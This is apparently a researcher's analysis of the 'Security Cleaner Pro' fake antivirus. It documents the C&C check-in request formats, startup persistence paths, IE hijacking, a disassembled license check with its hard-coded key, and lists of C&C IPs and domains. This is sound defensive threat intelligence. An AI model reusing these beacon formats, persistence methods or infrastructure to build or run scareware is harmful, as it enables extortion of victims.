Another one of the FakeAV’s, this time it is called “Security Cleaner Pro”. The detection is quite low, 4/48 on VT for the loader and 8/48 for the payload.

Loader 2a8038d3acd963e804ca38a912ba116b : VirusTotal

Payload 8d15016f249274158e0472a02f9de00e : VirusTotal

Analysis

This sample dropped from Blackhole and installed itself as usual with a shortcut on the desktop and active in the system tray.

When the loader starts it will try setting up a connection with the C&C to report a new install for the loader. After this it requests a payload. This payload will also check-in to tell it has properly installed. After that the FakeAV payload will do check-ins at a regular interval to confirm payment to the C&C. On a network level this looks like this step by step:

GET http://<domain> .tld/index/install/?id=<system id>&os=(xp|win7|win8)(pro)?sp[0-9]&advertid=[0-9]{5}&type=1

200 OK (text/html)

GET http://<domain> .tld/index/getsoft/?id=<unique_system_id>&os=<os_info>&advertid=<affiliate_id>&type=1

200 OK (application/octet-stream)

GET http://<domain> .tld/index/install/?id=<system id>&os=(xp|win7|win8)(pro)?sp[0-9]&advertid=[0-9]{5}&type=2

200 OK (text/html)

GET http://<domain>.tld/index/checklic/?id=<system id>&os=(xp|win7|win8)(pro)?sp[0-9]

200 OK (text/html)

As you can see the install checking with type 1 is the loader and type 2 is the actual FakeAV payload. We get an non-crypted payload back.

After the payload has been downloaded it is copied to:

C:\Documents and Settings\All Users\Start Menu\Programs\Startup\shl.exe

The filename is fixed and always seem to be the same. One thing to note is that other versions I had installed in %appdata% and set a startup key instead of dropping in the startup folder, like so:

[ HKU\S-1-5-21-842925246-1425521274-308236825-500\Software\Microsoft\Windows\CurrentVersion\Run ], "ProtSoftware Inc" = "C:\Documents and Settings\All Users\Application Data\shl.exe"



The filename shl.exe seems to be fixed since earlier versions as well.

After having setup itself the application starts with the usual infected scan information:



So yes the usual, we are infected! Now before digging into the activation lets look around at the applications. It features (fake) updating:



The rest of the application shows generic options which are all (obviously) fake and have no function.

You can also contact the support desk via email if you click the button at the top:



From time to time there is also a fake Windows Security Center popup to warn you to activate the AV, the entire dialog is an image and clicking anywhere just brings the FakeAV to the front:



Another trick this FakeAV does is hijack the browser, only Internet Explorer. When a new process is spawned it will check the filename, if its named ‘iexplorer.exe’ it will let it run, otherwise it will be killed. Funny enough it doesn’t seem to be able to pick up new processes fast enough so if you just start your debugger 5-10 times fast one of them will not be killed.

The injection in IE looks like this when trying to browse anywhere:



Lets look at the activation of this 'product’. When you click register you will get a page looking really familiar, it seems to be a generic payment template also used by the Titan AV I wrote about some time ago.

We can pay or put in a registration key ourselves

If we cancel we get a warning message of how we are unprotected.

And if we enter the wrong information we get a warning.



So we open up our debugger and we figure out how the check works:

00407F62 |> 50 PUSH EAX ; /String2

00407F63 |. 51 PUSH ECX ; |String1

00407F64 |. FF15 BC704100 CALL DWORD PTR DS:[<&KERNEL32.lstrcmpiW> ; \KERNEL32.lstrcmpiW

00407F6A |. 8BD8 MOV EBX,EAX

00407F6C |. F7DB NEG EBX

00407F6E |. 1ADB SBB BL,BL

00407F70 |. 6A 01 PUSH 1 ; /Arg1 = 1

00407F72 |. 33FF XOR EDI,EDI ; |

00407F74 |. 8D75 9C LEA ESI,[EBP-64] ; |

00407F77 |. E8 63260000 CALL 0040A5DF ; \security_cleaner_pro.0040A5DF

00407F7C |. FEC3 INC BL

00407F7E |. 74 2B JZ SHORT 00407FAB

00407F80 |. 6A 40 PUSH 40 ; /Type = MB_OK|MB_ICONASTERISK|MB_DEFBUTTON1|MB_APPLMODAL

00407F82 |. 68 64C74100 PUSH OFFSET 0041C764 ; |Caption = “Information”

00407F87 |. 68 7CC74100 PUSH OFFSET 0041C77C ; |Text = “Thank you for registering!”

00407F8C |. FF75 98 PUSH DWORD PTR SS:[EBP-68] ; |hOwner => [ARG.EBP-68]

00407F8F |. FF15 20724100 CALL DWORD PTR DS:[<&USER32.MessageBoxW> ; \USER32.MessageBoxW

A simple string compare with the real key, so to activate this FakeAV we can use the following key which is hard-coded in all the bins I’ve tried. The key:



YKGVWHVSFETPXBIMDXUJSUYGPRADAOHZ

Now we are licensed and we can 'clean’ the infections found during the scan. We are now also allowed to start new applications.

And as we can expect after registration any new scan turns up no infections.

Command and Control Server(s)

So with this FakeAV there are 4 dedicated C&C servers which form the backend. The initial domain seen with the first version I got was wirejournal.biz, after a day or so I got a new hit on lenderspoker.in. All the domains have multiple A-records pointing to:

188.93.210.164 - Russian Federation Moscow Ltd Hosting Service

109.234.154.254 - Russian Federation Saint Petersburg Ooo Network Of Data-centers Selectel

109.120.150.95 - Russian Federation Saint Petersburg Zao National Telecommunications

91.240.22.98 - Ukraine Donets'k Wibo Project Llc

After some more checking I was able to find more domains used by these IP’s. Not sure what all these are for but its a somewhat big list for just a FakeAV:

blogscifi.info

corporationsbenefits.info

hichspeedtest.com

high-speed-dns.com

journalvillepremium.info

lenderspoker.in

lite-interserve-promo.com

mapaddiction.biz

ntbook.ru

podcastbots.info

psychologistdrive.info

requiresearch.info

testingadvisor.info

wirejournal.biz

woolis.ru

At the beginning you saw the structure of the check-ins. One of the params given with the check-in is 'advertid’. This refers to an affiliate of the program. The idea is that you sign up, get your own affiliate ID, you spread the loader given to you which checks in with your personal ID and for every new client you infect with it you get money. As simple as that.





One thing the C&C servers do when retrieving the loaders or payloads it modifies a resource of the PE called 'RCDATA’ to hold your personal ID. This way an infection can be lead back to the appropriate affiliate for payment. This does mean every affiliate has unique bins. I’ve been able to identify at least 49 affiliates and have retrieved 89 unique loaders and 42 payloads. To get the AV vendors to create generic detection instead of specifics for a bin hash I’ve decided to upload all of them. At the end of the article you will find a section called 'Unique Samples’ with their VT link. If you want any of these samples to analyze/play with send me a message on twitter or email me.

Additional info

Additionally when running the FakeAV through my debugger I found the following string in memory “http://softsupport.info/open.php”. This domain is registered to a guy with the email address “dorvey_creator@rocketmail.com”. If we look this up we get a list of domains all pointing to either 95.141.28.79 or 95.141.28.81. The list of domains I was able to get looks sketchy already:

cleanerpro1.biz

cleanerpro2.biz

cleanerpro3.biz

cleanerpro4.biz

cleanerpro5.biz

cleaner-pro1.biz

cleaner-pro2.biz

cleaner-pro3.biz

cleaner-pro4.biz

cleaner-pro5.biz

cleaner-pro6.biz

cleaner-pro7.biz

cleaner-pro8.biz

cleaner-pro9.biz

cleaner-pro10.biz

cleaner17.biz

I do not know what this guy is up to but if you also check the VT entries for those IP’s: [95.141.28.79] and [95.141.28.81] you can see tons of DynDNS passing by. If I find out what his connection is to this FakeAV or what he is doing with those servers and domains I’ll write another article.





Unique Samples

Loaders (88 in total)

Payloads (42 in total)